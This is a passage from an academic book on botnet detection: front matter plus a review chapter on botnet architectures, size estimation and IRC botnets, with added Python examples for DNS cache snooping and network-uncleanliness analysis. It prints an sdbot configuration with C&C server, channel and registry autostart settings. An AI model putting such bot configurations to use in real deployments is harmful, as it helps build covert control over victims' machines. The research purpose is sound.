To stay off the radar and increase the resilience of their botnet, botmasters employ covert command and control (C2) channels for keeping in touch with the bots and disseminating their instructions. Nowadays, they even hide their C2 servers inside the vast cloud-computing infrastructure and exploit robust anonymity networks such as Tor and I2P. To do so, a botmaster takes advantage of a variety of architectures, namely centralized, decentralized, and hybrid, relies on network protocols including HTTP, IRC, DNS, and P2P, and exploits techniques like fast-fluxing and domain generation algorithms (DGA). On the other hand, the efforts of the defenders focus on the timely detection and hijacking of the C2 channel to isolate the bots from their controller.

Besides launching DDoS attacks, botnets are used for spam campaigns, sensitive data harvesting, distribution of malware, cryptocurrency mining, and defamation campaigns, to name a few. In fact, a botnet is the perfect means to exercise economically profitable, low-risk criminal activities. Typically, the botmaster leases their infrastructure to potential customers for accomplishing their goals. So, even for a naive attacker, it is easy to hire the service of a botnet for a specific period in order to fulfil their nefarious desires, while the accumulated revenue for the botmaster is huge. Perhaps the most popular service that actually sells access to DDoS botnets is well known as DDoS-for-hire or, euphemistically, a “Stresser.” Of course, all these botnet services are created by cybercrime-as-a-service producers. Even more, with the exploitation of the infected machines’ computing power for cryptocurrency mining, the profit of the botmaster can be significantly increased, while the trace-back of the revenues is rendered impossible.

This book comprises a number of state-of-the-art contributions from both scientists and practitioners working in the detection of botnets and the prevention and mitigation of their aftermath. It aspires to provide a relevant reference for students, researchers, engineers, and professionals working in this particular area, or those interested in grasping its diverse facets and exploring the latest advances on the botnet issue. More specifically, the book consists of 12 contributions classified into 4 pivotal subareas:

Botnet architectures: Introducing the state-of-the-art botnet architectures, the most prominent IoT-based botnet cases, and the latest traits and techniques for IoT-based botnets.

C2 channels: Offering the latest variants of advanced and sophisticated C2 channels based on information hiding techniques, steganography, and blockchain technology.

Detection and mitigation of botnets: Dealing with the detection of botnet communication in big data, the analysis of network traces for the detection of algorithmically generated domains utilized for the coordination of botnets, the identification of IoT-based botnets via microservice architectures, and the detection of social botnets.

Financial revenue from botnets: Exploring the exploitation of botnets for mining cryptocurrencies, and the utilization of botnets as a profitable tool for criminals.
About the Editors
Dr. Marios Anagnostopoulos received his Ph.D. degree in information and communication systems engineering from the Department of Information and Communication Systems Engineering, University of the Aegean, Greece, in 2016. The title of his doctoral thesis was “DNS as a multipurpose attack vector.” Currently, he is a Post-Doctoral Research Fellow at the Norwegian University of Science and Technology (NTNU). Prior to joining NTNU, he worked as a Post-Doctoral Research Fellow at the Singapore University of Technology and Design (SUTD). His research interests are in the fields of network security and privacy, mobile and wireless network security, cyber-physical security, and blockchain in security and privacy.
Dr. Georgios Kambourakis received the Ph.D. degree in information and communication systems engineering from the Department of Information and Communications Systems Engineering, University of the Aegean, Greece, where he is currently an associate professor and the head of the department. His research interests are in the fields of mobile and wireless network security and privacy. He has over 120 refereed publications in the aforementioned fields of study. For more information, please visit http://www.icsd.aegean.gr/gkamb.
Dr. Weizhi Meng is currently an assistant professor in the Cyber Security Section, Department of Applied Mathematics and Computer Science, Technical University of Denmark (DTU), Denmark. He received his Ph.D. degree in computer science from the City University of Hong Kong (CityU), China. Prior to joining DTU, he worked as a research scientist at the Institute for Infocomm Research, A*Star, Singapore, and as a senior research associate in the CS Department, CityU. He won the Outstanding Academic Performance Award during his doctoral study and is a recipient of the Hong Kong Institution of Engineers (HKIE) Outstanding Paper Award for Young Engineers/Researchers in both 2014 and 2017.
He is also a recipient of the Best Paper Award from ISPEC 2018 and the Best Student Paper Award from NSS 2016. His primary research interests are cyber security and intelligent technology in security,
including intrusion detection, smartphone security, biometric authentication, HCI security, trust management, blockchain in security, and malware analysis.
Dr. Peng Zhou is currently an associate professor at Shanghai University. He received his Ph.D. degree from the Hong Kong Polytechnic University and worked as a research fellow at Nanyang Technological University, Singapore, for one year. His research interests include network security, computer worms and propagation, and machine learning.
Contributors
Yuede Ji, George Washington University
Qiang Li, College of Computer Science and Technology, Jilin University, Changchun, China
Miguel Correia, INESC-ID, Instituto Superior Técnico, Universidade de Lisboa
Luís Sacramento, INESC-ID, Instituto Superior Técnico, Universidade de Lisboa
Ibéria Medeiros, LASIGE, Faculdade de Ciências, Universidade de Lisboa
João Bota, Vodafone Portugal
Melody Moh, Dept. of Computer Science, San Jose State University, San Jose, CA, USA
Tharun Kammara, Dept. of Computer Science, San Jose State University, San Jose, CA, USA
Luca Caviglione, Institute for Applied Mathematics and Information Technologies, National Research Council of Italy, Italy
Wojciech Mazurczyk, Warsaw University of Technology, Poland
Steffen Wendzel, Worms University of Applied Sciences, Germany
Federica Bisio, aizoOn, Strada del Lionetto, Torino, Italy
Danilo Massa, aizoOn, Strada del Lionetto, Torino, Italy
Giuseppe Giulio Rutigliano, University of Rome Tor Vergata, Italy
Giovanni Bottazzi, LUISS Guido Carli University, Italy
Gianluigi Me, LUISS Guido Carli University, Italy
Pierluigi Perrone, University of Rome Tor Vergata, Italy
Renita Murimi, Oklahoma Baptist University, USA
Basheer Al-Duwairi, Jordan University of Science and Technology, Jordan
Moath Jarrah, Jordan University of Science and Technology, Jordan
Pascal Geenens, Radware, Inc.
Xiaobo Ma, Ministry of Education Key Lab for Intelligent Networks and Network Security, School of Electronic and Information Engineering, Xi’an Jiaotong University
Weizhi Wang, Ministry of Education Key Lab for Intelligent Networks and Network Security, Xi’an Jiaotong University
Jedrzej Bieniasz, Institute of Telecommunications, Warsaw University of Technology, Poland
Krzysztof Szczypiorski, Institute of Telecommunications, Warsaw University of Technology, Poland
Chapter 1
Botnet Architectures: A State-of-the-Art Review
Basheer Al-Duwairi and Moath Jarrah
Faculty of Computer & Information Technology, Jordan University of Science & Technology, Jordan

Contents
1.1 Introduction
1.2 Botnets Main Characteristics
1.2.1 Overview
1.2.2 Characterizing Botnets
1.2.2.1 The Botnet Size
1.2.2.2 Geographical Distribution of Botnets
1.2.2.3 Spatial-Temporal Correlation and Similarity
1.3 Centralized Botnets
1.3.1 Case Study: IRC-based Botnets
1.4 P2P Botnets
1.4.1 Case Study: ZeroAccess P2P Botnet
1.5 Mobile Botnets
1.5.1 Examples of Mobile Botnets
1.5.1.1 SMS-based Mobile Botnets
1.5.1.2 Cloud-based Push-styled Mobile Botnets
1.6 IoT Botnets
1.7 Social Botnets
1.7.1 Operation
1.8 Conclusion
1.1 Introduction
In recent years, cybercrimes associated with botnets have been considered a major threat to the Internet and to technology in general. A botnet consists of a number of infected hosts that receive commands from a botmaster [1]. The botnet is formed by installing bots on vulnerable computers. Bots are software programs that perform actions upon receiving commands from users or programs. Bots usually stay in a passive state until they receive commands from the botmaster (a hacker). Bots are designed to establish and utilize available communication channels that enable them to receive commands, execute them, and periodically report data back to the botmaster. Reports include their status and statistical information. Furthermore, bots are usually programmed to keep themselves up to date with the latest bot version. The botmaster maintains control over the botnet through the command and control (C&C) communication channel, which represents the core of the botnet. Generally, bots try to exploit software vulnerabilities that allow malicious programs to infect computing systems. Examples of such weaknesses are buffer overflows, backdoor installations, software bugs, and insecure memory management mechanisms. Releasing bot code to the public results in the spreading of many variants of the bot within a short time [2–5]. Making the bot’s source code available makes it easier for hackers to extend it and develop more sophisticated code to serve their objectives. For example, Agobot has a modular design, which makes it attractive to botnet developers. According to [2], there exist different types of bots and different variants of each type in today’s digital computing world. Hackers are always interested in discovering new software vulnerabilities and in improving their bots to a higher level of sophistication. Hence, it is expected that more bots will evolve and pose serious threats.
This urges companies and researchers to develop efficient countermeasure methods to stop the cybercrimes posed by botnets. Botnets represent a major contributor to malicious traffic in today’s Internet [1]. Moreover, the botnet attack landscape has expanded tremendously in recent years because of new, highly sophisticated versions of botnets. The development of botnet architectures and types is driven by hackers’ interests, the expansion of the Internet, and the development of Internet technology. Organized hacking groups, organizations, and cyber criminals are increasingly threatening businesses; about one-third of the world’s companies have experienced the threat of cybercrime [6]. Botnets are being used extensively for malware distribution targeting the banking sector [7]. Botnets provide hackers with a platform for personal profit and financial gain through extortion, ransomware, and cryptocurrency mining. Cyberattacks are also targeting critical Internet infrastructure and cyber-physical systems, including smart grids, nuclear plants, and transportation systems. In addition, botnets are expected to take a role in future cyber wars. With the
tremendous expansion of the Internet, botnets are no longer limited to infecting only PCs and laptops. Several types of botnets have appeared in recent years, such as smartphone, Internet of Things (IoT), and social botnets. The enormous growth of botnets has enabled hackers to use them for different forms of malicious activity, including distributed denial-of-service (DDoS) attacks, email spam, click fraud, and identity theft. In this context, botnets can be viewed as an attack infrastructure that is used to launch several types of cybercrimes. This chapter focuses on the emerging and predominant threat of botnets. In Section 1.2, we provide a detailed description of botnets and discuss their main characteristics. Section 1.3 discusses centralized botnets. Section 1.4 explains peer-to-peer (P2P) botnets. Section 1.5 presents mobile botnets. Section 1.6 describes IoT-based botnets. Social botnets are presented in Section 1.7. Finally, the conclusion is presented in Section 1.8.
1.2 Botnets Main Characteristics
A botnet can be viewed as an attack infrastructure that consists of compromised hosts connected together to form a network using a variety of application layer protocols, such as IRC, HTTP, email, and P2P protocols. In this section, we discuss the botnet life cycle, explain their malicious usage, discuss their main characteristics, and illustrate different approaches that are used to obtain insightful information about botnets.
1.2.1 Overview
A botnet’s lifetime consists of three main stages, as follows.
Stage 1—recruitment stage: The botnet formation starts by recruiting as many vulnerable machines as possible to become part of the botnet. This is done by infecting machines with the bot code using different mechanisms. One of the mechanisms adopts traditional worm propagation techniques to spread botnet malware [8,9]. This approach does not require any user intervention.
An infected machine has the ability to search for other vulnerable machines on the Internet by actively scanning for known vulnerabilities. There are several mechanisms to recruit vulnerable machines in a passive manner, where user intervention is required. Social engineering is a powerful mechanism used by botmasters to convince end users to download bot binaries [10,11]. This is usually achieved by sending out massive phishing campaigns through email and social networks (e.g., Twitter, Facebook), where a user is tricked into clicking on a malicious link that results in the download of a bot binary [12,13]. In other cases, the malware may spread as an email attachment or by tricking the user into visiting websites that have active content such as JavaScript or ActiveX controls.
When a user visits a website that contains malicious active content, the malware is installed automatically. It is also possible to spread botnet binaries through physical media (e.g., USB flash drives), where the malware is usually in the form of an executable that starts running as soon as the user double-clicks it. Physical media infection aims to compromise machines with private IP addresses that are not directly reachable from the Internet (e.g., behind a NAT box).
Stage 2—C&C stage: The botmaster maintains control over the infected machines (bots) through a C&C channel. The architecture of the botnet depends on the implementation of the C&C channel. In centralized botnets, the botmaster controls the botnet through a central server known as the C&C server. In P2P botnets, there is no central server between the botmaster and the botnet machines. Instead, the botmaster communicates directly with a small subset of the botnet machines, which serve as mailboxes between the botmaster and the other bots. These machines are located using the inherent features of the P2P protocol that is used to implement the botnet. More details on centralized and P2P botnets are provided in Section 1.3 and Section 1.4. The communication style between the botmaster and the bots can be push or pull. In the push style, commands are sent directly to the bots. In the pull style, bots (infected machines) periodically check for new commands [14]. The two communication styles are illustrated in Figure 1.1.
Stage 3—botnet activity stage: The botnet activity represents the set of actions and attacks (e.g., DDoS, scanning, etc.) performed by bots in response to commands issued by the botmaster [15–17]. A compromised host’s bandwidth is important information that indicates the host’s capability in launching attacks, especially DDoS. Hence, bots estimate the host’s bandwidth by sending data to many servers.
Figure 1.1 Botnet communication styles: (a) Push style (b) Pull style.
Figure 1.2 shows an example of IRC-based botnet activity in response to a set of commands issued by the botmaster. The figure shows the interaction between a botmaster (nickname seed) and one of the bots (nickname vofm) in an IRC chat channel (#nes554). This is a typical example of push style communication, where the botmaster issues commands that are sent to the bot directly. For example, the command .open notepad instructs the bot to run notepad.exe. Running the Notepad application is just an example that shows the capabilities of this botnet. Botmasters instruct bots to run malware binaries after downloading them from a given server. Another example involves instructing the bot to perform a DNS query for a given host name and return the result to the botmaster.
Figure 1.2 Example of an IRC-based botnet activity.
Understanding botnets and their operational aspects requires us to investigate different bots to reveal their malicious intents [2]. For example, P. Barford et al. studied the source codebases of the four major bots Agobot, SDBot, SpyBot, and GT Bot [18]. Analyzing bots’ source code or running a botnet malware instance in a sandbox are efficient methods to identify botnet features and capabilities, including the C&C mechanisms. In general, botnets are considered major sources of different types of attacks and malicious activities in the Internet. This includes the following:
■ DDoS attacks: Botnets are used to launch several types of DDoS attacks, such as application layer attacks (e.g., HTTP-based attacks), SYN flooding, and DNS amplification attacks. Bots are instructed to overwhelm the target system with a high volume of traffic (e.g., HTTP requests, SYN packets, and DNS requests).
■ Email spam campaigns: This refers to sending a large amount of spam email, which results in traffic that decreases the signal-to-noise ratio [19]. Email spammers usually use botnets for massive spam campaigns to advertise pharmaceutical products and adult content, and to distribute malware. An email spam template is distributed along with a recipient list to the workers (bots). The bots are then instructed to send spam with the contents specified in advance by the spammer.
■ Identity theft: Botmasters have the ability to collect sensitive information (such as email accounts, banking accounts, and credit card numbers) from the bot machines.
■ Cryptocurrency mining: The computing power of the machines that belong to a botnet can be utilized by botmasters to mine cryptocurrency (e.g., bitcoins) illegally.
■ Click fraud: A botmaster generates bogus clicks on online advertisements, usually by crafting HTTP request header fields so that the requests mimic legitimate request patterns, which results in large sums of money being paid by the advertisers [20]. Online advertisement is becoming very popular, and its pricing model is usually based on a pay-per-click approach, meaning that the revenue of the advertisement platform (e.g., Facebook, Google) depends on the number of clicks made through the platform. Unfortunately, several hackers exploit this model and use botnets to perform fraudulent clicks.
Based on the above discussion, botnets have two main planes of operation: (i) the C&C plane, where bots continuously wait for commands from the botmaster, and (ii) the activity plane, which involves the execution of the received commands to launch different attacks such as DDoS, cryptocurrency mining, spam campaigns, and click fraud. The C&C topology determines the method of command delivery. In centralized botnets, the botmaster communicates with the bots through a central server, while in P2P botnets, the botmaster communicates with the bots through a subset of bots (mailboxes).
1.2.2 Characterizing Botnets
There have been considerable research efforts to characterize botnets and understand their operations (e.g., [1,15,18,21–23]). These studies focused on estimating botnet sizes, geographical distributions, and their spatial and temporal characteristics. Such
characterization was accomplished by conducting offline analysis of traffic traces and packet logs to gain insight into the nature of this threat. The community is also interested in understanding botnet formation techniques. Based on these research studies, the main characteristics of botnets are described below.
1.2.2.1 The Botnet Size
The size of a botnet is an important factor in the intensity and the spread of cyberattacks. The importance of this metric and its role in measuring botnet effectiveness have been discussed in [24]. While large botnets are viewed as a serious threat to Internet services, small botnets are also a threat, especially for attacks that do not require a large amount of traffic, such as ransomware and identity theft. Small botnets can be easily managed and rented, and can stay undetected. Determining the actual size of a botnet is an important issue because it leads to a better understanding of the threat. In this context, botnet size has been a point of debate because it is unclear what the term “botnet size” exactly means. The ambiguity is due to several issues that complicate the task of counting the compromised machines in a botnet. Bots join and leave as a result of (i) infected machines being turned on and off by their users, (ii) temporary bot migration, in which botmasters ask bots to leave one botnet and join a different one, and (iii) cloning, where bots make replicas of themselves and connect to different channels or servers [1]. Most researchers agree that a clear definition of botnet size must be used. Here we adopt the definition used in [24], which states that botnet size is the largest connected portion of the botnet [24,25]. This does not represent the count of all infected machines within a botnet; it mainly represents the count of online bots (the machines that are currently active).
There are several techniques to determine the size of a botnet. These mainly depend on the botnet architecture and on the ability to infiltrate or take over the botnet. The following techniques are typically used to estimate botnet size [25]:
■ Botnet infiltration: The main idea of this technique is to join the C&C channel of a botnet (e.g., to connect to the IRC server of the botnet) and then record the number of bots that are connected to the channel simultaneously. This can be achieved by implementing an IRC tracker (similar to the one presented in [1]) that mimics the operation of an actual bot.
■ DNS redirection: This method redirects connections made to the botnet’s C&C server to another server (e.g., a sinkhole) by manipulating the DNS entry associated with the server [26]. By completing the three-way TCP handshake with connecting bots, the sinkhole can identify these bots and record their IP addresses. This technique has the limitation of counting only bots that attempt to connect to the C&C server during the measurement period. Also, in cases where the botmaster uses multiple channels on the same C&C server, it is not possible to identify bots that belong to a certain channel. Finally, Zou et al. [27] explain that botmasters can easily detect this technique and redirect the bots to a different IRC server.
■ DNS cache snooping: This method collects information from thousands of DNS servers by searching their caches for entries of a botnet’s C&C server. M. Abu Rajab et al. used this method successfully to estimate botnet sizes [1]. In most cases, bots need to resolve the IP address of the C&C server by querying a DNS server. Therefore, the size of the botnet can be estimated by probing a large collection of DNS servers and counting cache hits. The list of available DNS servers can be obtained by performing a fast Internet-wide scan (e.g., using ZMap [28]). A cache hit on a DNS server indicates that at least one bot sent a query to that server before the expiration of the corresponding botnet entry. The number of cache hits serves as a lower bound on the number of bots.
■ Crawling P2P botnets: Botnet size estimation in P2P botnets is done mainly by crawling the botnet recursively. Starting from one bot, a request is issued to get its peer list. A request is then issued to each IP address in the peer list. This process continues recursively until no additional IP addresses are observed. The crawling speed is important, as the structure of the P2P botnet graph changes frequently: bots join and leave in an unpredictable way, and this churn occurs while peer list requests are being sent and analyzed. Hence, crawling must be done very quickly to get an accurate snapshot of the current P2P graph.
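The cache-snooping probe described above, as an added example that is not code from the chapter or from [1]: a Python script (standard library only) that builds the non-recursive query, classifies a resolver’s reply as cache hit or miss, and keeps the lower-bound count. The C&C domain name is a made-up placeholder, and the fake_* helpers stand in for a resolver so the logic runs offline; snoop_resolver() is the only part that touches the network.

```python
import socket
import struct

# Placeholder C&C name used only for this illustration (assumption).
CNC_DOMAIN = "cnc.example.net"


def build_snoop_query(name, txid=0x1234):
    """Build a DNS A query with the RD (recursion desired) bit cleared.

    With RD=0 a resolver answers only from its cache and does not fetch
    the name on our behalf, so an answer proves that a client behind that
    resolver looked the name up within the record's TTL.
    """
    flags = 0x0000                                   # QR=0, opcode=0, RD=0
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"".join(bytes([len(p)]) + p.encode("ascii")
                     for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _skip_name(msg, off):
    """Return the offset just past a (possibly compressed) domain name."""
    while True:
        n = msg[off]
        if n == 0:
            return off + 1
        if n & 0xC0 == 0xC0:                         # compression pointer
            return off + 2
        off += 1 + n


def parse_snoop_response(msg):
    """Classify a reply as (hit, remaining_ttl, rcode).

    hit=True means the resolver had the name cached. The TTL it returns is
    the remaining lifetime, so original TTL minus this value tells roughly
    how long ago the last bot behind this resolver asked for the name.
    """
    _txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    rcode = flags & 0x000F
    off = 12
    for _ in range(qd):
        off = _skip_name(msg, off) + 4               # skip QTYPE/QCLASS
    if an == 0:
        return False, None, rcode
    off = _skip_name(msg, off)
    _rtype, _rclass, ttl, _rdlen = struct.unpack("!HHIH", msg[off:off + 10])
    return True, ttl, rcode


def snoop_resolver(server_ip, name=CNC_DOMAIN, timeout=2.0):
    """Send one probe over UDP/53 and classify the reply (needs network)."""
    query = build_snoop_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (server_ip, 53))
        data, _ = sock.recvfrom(512)
    if data[:2] != query[:2]:
        raise ValueError("transaction id mismatch")
    return parse_snoop_response(data)


def lower_bound_bots(results):
    """Each cache hit proves at least one bot behind that resolver; the
    sum is only a lower bound, since many bots may share one resolver."""
    return sum(1 for hit, _ttl, _rcode in results if hit)


# Offline stand-ins for a resolver so the example runs without a network.
def fake_cached_response(query, ttl, ip="203.0.113.5"):
    """Reply a resolver would give when the name is in its cache."""
    txid = struct.unpack("!H", query[:2])[0]
    qd_end = _skip_name(query, 12) + 4
    header = struct.pack("!HHHHHH", txid, 0x8080, 1, 1, 0, 0)  # QR=1, RA=1
    answer = (b"\xc0\x0c"                              # pointer to the QNAME
              + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip))
    return header + query[12:qd_end] + answer


def fake_miss_response(query):
    """Reply when the name is not cached: NOERROR with an empty answer."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8080, 1, 0, 0, 0)
    return header + query[12:]
```

Two caveats a practitioner should keep: a reply with rcode 5 (REFUSED) means the resolver rejects non-recursive queries altogether and must be recorded as “no information,” not as a miss; and a single hit on a large ISP resolver may hide thousands of bots, which is why the count is only the lower bound the text describes.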
1.2.2.2 Geographical Distribution of Botnets
Although bots can be found anywhere in the Internet, research studies show that they are concentrated in particular regions of the world [26]. There are several factors that affect the geographical distribution of botnets. One important factor is the underlying bot infection propagation mechanism when it involves a region or a language: some botnets attack applications of a specific language or perform social engineering in a specific regional language [26]. The distribution of bots in the Internet is an important issue because it can assist in developing efficient countermeasures [22,23,29]. This distribution is mainly influenced by the distribution of vulnerable machines in the Internet. It is believed that vulnerable machines tend to cluster in certain networks, which suggests that bots will cluster in these networks as well, regardless of the method followed by botmasters in constructing botnets. This is based on the observation that the population of vulnerable machines in a given organizational network depends directly on the nature of the network security policies enforced by the organization, and on the level of awareness of users regarding hardening and protecting their own machines. For example, an organization that enforces a strict security policy, deploys the latest technology to prevent security breaches, and provides its employees with state-of-the-art virus scanners is expected to have a very small number of vulnerable machines.
M. P. Collins et al. explain that botnets have the following two characteristics [22]:
■ Spatial uncleanliness: When there is a compromised host in a network, there is a high chance of finding other hosts in the same network that are compromised and performing hostile activities. This clustering of hostile activities within a network results in an unclean network.
■ Temporal uncleanliness: If there is a compromised host in a network, then this host or other hosts within the network are likely to be compromised in the future. Hence, the hosts in the network will undergo hostile activities over time.
The test for spatial uncleanliness was conducted by examining the clustering of IP addresses within different networks. It was found that compromised hosts cluster within equally sized networks more than would be expected if hosts and addresses were chosen at random from the Internet population. The test for temporal uncleanliness was conducted by examining unclean networks: networks that contain compromised hosts were found to predict future hostile activity with higher accuracy than networks chosen at random.
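An added example, not code from [22] or from the chapter, showing how both uncleanliness tests can be run over a set of detection events: hostile hosts are grouped by network of equal size, the spatial test measures how much they cluster against an analytic random baseline, and the temporal test asks how well networks that were unclean on one day predict hostile activity on the next. The event list, the /24 granularity, and the two-day window are assumptions made for the illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed detection events (day, host address) for hosts seen doing
# hostile activity such as scanning. Not real data.
EVENTS = [
    (1, "198.51.100.10"), (1, "198.51.100.23"), (1, "198.51.100.77"),
    (1, "203.0.113.4"), (1, "192.0.2.200"), (1, "172.16.5.5"),
    (2, "198.51.100.23"), (2, "198.51.100.91"), (2, "203.0.113.9"),
    (2, "192.0.2.17"), (2, "10.9.8.7"),
]


def network_of(ip, prefix_len=24):
    """Map a host address to the equally sized network that contains it."""
    return ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)


def hosts_by_network(ips, prefix_len=24):
    """Group hostile hosts by their containing network."""
    groups = defaultdict(set)
    for ip in ips:
        groups[network_of(ip, prefix_len)].add(ip)
    return groups


def spatial_uncleanliness(ips, prefix_len=24):
    """Fraction of hostile hosts that share their network with another
    hostile host. 0.0 means no clustering at this granularity."""
    hosts = set(ips)
    if not hosts:
        return 0.0
    groups = hosts_by_network(hosts, prefix_len)
    clustered = sum(len(h) for h in groups.values() if len(h) > 1)
    return clustered / len(hosts)


def expected_random_clustering(n, prefix_len=24):
    """Spatial uncleanliness expected if n hosts were drawn uniformly from
    the IPv4 space: the chance that a host shares its network with at
    least one of the other n-1 hosts. This is the baseline to beat."""
    p_same = 1.0 / (1 << prefix_len)                 # 2**prefix_len networks
    return 1.0 - (1.0 - p_same) ** (n - 1)


def unclean_networks(events, day, prefix_len=24):
    """Networks with at least one hostile host on the given day."""
    return set(hosts_by_network([ip for d, ip in events if d == day], prefix_len))


def temporal_uncleanliness(events, day_a, day_b, prefix_len=24):
    """Use the networks that were unclean on day_a as a predictor of hostile
    activity on day_b. Returns (precision, recall) over networks."""
    predicted = unclean_networks(events, day_a, prefix_len)
    actual = unclean_networks(events, day_b, prefix_len)
    if not predicted or not actual:
        return 0.0, 0.0
    hits = predicted & actual
    return len(hits) / len(predicted), len(hits) / len(actual)


def report(events=EVENTS, prefix_len=24):
    """Summarize both tests for the constructed data."""
    day1 = [ip for d, ip in events if d == 1]
    return {
        "spatial": spatial_uncleanliness(day1, prefix_len),
        "random_baseline": expected_random_clustering(len(set(day1)), prefix_len),
        "temporal": temporal_uncleanliness(events, 1, 2, prefix_len),
    }
```

On the constructed data half of the day-1 hosts sit in a /24 that holds another hostile host, against a random-draw expectation of well under one in a million, and the day-1 unclean networks predict day-2 activity with precision and recall of 0.75 each. On real data the prefix length should match the size of the networks being compared, as in [22], and a larger window than two days is needed before the temporal figure means much.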
1.2.2.3 Spatial-Temporal Correlation and Similarity
In addition to the spatial and temporal uncleanliness described above, botnets are generally characterized by a spatial-temporal correlation that follows directly from their inherent features. During a certain time interval, bots within an organizational network perform similar operations in response to commands issued by the botmaster. Typically, these bots maintain long-lived connections with the C&C server and remain on standby for commands. Two types of responses are observed when bots receive commands from the botmaster:
■ Message response: Certain commands are used by the botmaster to obtain information about the bot machine. This information includes the operating system version, CPU architecture, bandwidth, and the bot ID. Bots typically respond with short messages that contain the requested information. Figure 1.3a shows an example of message responses of three bots within an organizational network.
■ Activity response: Other commands issued by the botmaster are associated with specific activities such as scanning, denial-of-service attacks, and email spam. Therefore, each bot generates a large amount of traffic of a certain type during the same time interval. Figure 1.3b shows an example of activity responses of three bots within an organizational network in response to different commands sent by the botmaster.
Figure 1.3 Spatial-temporal correlation and similarity: (a) message response crowd (e.g., bot ID); (b) activity response crowd (e.g., SYN attack, port scanning). Figure is adopted from [14].
1.3 Centralized Botnets
Most of the botnets (e.g., SDBot, Agobot, GTBot) that appeared at the beginning of the botnet era adopted a centralized architecture. In this architecture, the botmaster maintains a central server that communicates with the bots. The bots wait for commands from the central server. In addition, newly compromised hosts (bots) connect to the server and report their information. The server oversees the status of the bots and sends commands to be executed. This basic structure is shown in Figure 1.4.
Figure 1.4 Centralized botnet.
In centralized botnets, the C&C channel can be implemented using different protocols such as IRC (Internet Relay Chat), HTTP (Hypertext Transfer Protocol), and email. Recently, an advanced technique based on the Session Description Protocol (SDP) was proposed in [30] for the implementation of a botnet’s C&C channel. The technique uses SDP to construct a covert communication channel, which results in a stealthy and effective method for controlling a botnet. The growing interest in SDP as part of the Session Initiation Protocol (SIP) in VoIP networks requires the research community to develop efficient detection and mitigation mechanisms, as described in [31].
1.3.1 Case Study: IRC-based Botnets
IRC-based botnets represent one of the most popular types of centralized botnets that appeared in the early stages of the botnet threat. There are several families of IRC-based botnets, such as SDBot and Agobot. The release of the bot code to the public has allowed new variants of each family to appear within a short period of time. These botnets share similar characteristics and have been used for different types of attacks. IRC-based botnets utilize the communication capability of the IRC protocol, which allows point-to-point and point-to-multipoint communication. The protocol is scalable in the sense that it enables a large number of hosts to transfer data. The availability, flexibility, and modularity of the IRC protocol allow users to modify it and use it in their applications. Hence, botnet developers tend to use the IRC protocol to shorten their development time while obtaining an efficient communication protocol. As shown in Figure 1.5, the IRC-based botnet life cycle follows five steps, which are [1]:
1. Scanning for vulnerable hosts: Usually, the bot code is designed to automatically search for vulnerable hosts. This makes it similar to Internet worms, which means that worm scanning strategies can be adopted in the process of botnet formation.
2. Installing the bot code: The compromised machine downloads a binary image of the bot code from an existing botnet member (a machine that joined the botnet earlier) or from a malware server. A malware server is a dedicated machine configured in advance by the botmaster for this purpose. Afterward, the downloaded binary (the bot) is installed on the machine. Every time the machine is rebooted, the bot starts executing automatically. With today’s sophisticated malware distribution techniques, it is not necessary to strictly follow steps 1 and 2 in order to find and infect vulnerable machines. There are several methods that result in a host being infected by bot malware. For example, Gaobot and its variants infect hosts through instant messengers, file sharing, and various software vulnerabilities. In addition, some methods persuade victims to click on a link or a file that results in the execution of malicious code (e.g., clicking an email attachment).
3. Resolving the DNS name of the IRC server: Today’s botnet developers rely on domain names instead of IP addresses. Hence, a bot contacts DNS servers to resolve the domain name and obtain the IP address of the IRC server. The domain names are hard-coded in the bot’s binary.
4. Joining the IRC server: After a bot resolves the IP address of the IRC server, it establishes a session and joins the C&C channel on the server. This channel is also defined in the bot’s binary code. This process involves three types of authentication: (i) The bot has to authenticate itself to the C&C server using a password or an encryption key that is included in the bot’s binary. This prevents infiltration of the botnet by other systems or bots. (ii) The bot has to authenticate itself to the chat channel of the IRC server. This prevents other users or bots from joining the channel.
Users and security researchers try to join C&C channels to find the active members and commands that are issued. (iii) The botmaster has to authenticate itself to the bot’s population using a password or an encryption key that is stored in the bot’s binary in order to prevent other botmasters or researchers from controlling the botnet. 5. Receiving commands from the botmaster: Bots receive commands on the IRC channel (the channel’s topic). The channel’s topic specifies the commands that are to be executed by the bots. In terms of the botnet lifetime that was described in Section 1.2, steps 1 and 2 represent the recruitment stage, steps 3 and 4 represent the C&C establishment stage, and step 5 represents the activity stage. To illustrate the operation of IRC-based botnets, consider the configuration of the bot sdbotv5b, which is shown below. Bots are configured to match the settings of the IRC server that has been designed in advance as a C&C server. This includes passwords that are used for authentication, the server name, the port number, the chat channel name, and other parameters as indicated in the bot configuration below. 12 ■ Botnet
// bot configuration
const char botid[] = "bot1"; // bot id
const char password[] = "password"; // bot password
const int maxlogins = 4; // maximum number of simultaneous logins
const char server[] = "ircserver"; // server
const int port = 7777; // server port
const char serverpass[] = ""; // server password
const char channel[] = "#nes554"; // channel that the bot should join
const char chanpass[] = ""; // channel password
const char server2[] = ""; // backup server (optional)
const int port2 = 6667; // backup server port
const char channel2[] = ""; // backup channel (optional)
const char chanpass2[] = ""; // backup channel password (optional)
const BOOL topiccmd = FALSE; // set to TRUE to enable topic commands
const BOOL rndfilename = FALSE; // use random file name
const char filename[] = "nes554SDbot.exe"; // destination file name
const BOOL regrun = TRUE; // use the Run registry key for autostart
const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
const char valuename[] = "Configuration Loader"; // value name for autostart
const char prefix = '.'; // command prefix (one character max.)
const char version[] = "sdbot v0.5b by [sd]"; // bot's VERSION reply
const int cryptkey = 0; // encryption key (not used right now)
const int maxaliases = 16; // maximum number of aliases

Figure 1.5 IRC-based botnet life cycle. Figure is adopted from [1].

Once the bot joins the C&C channel, it becomes ready to receive and execute commands. For example, the botmaster may instruct the bot to perform a SYN flood attack against a certain target, or to download a certain malicious file from the Internet.

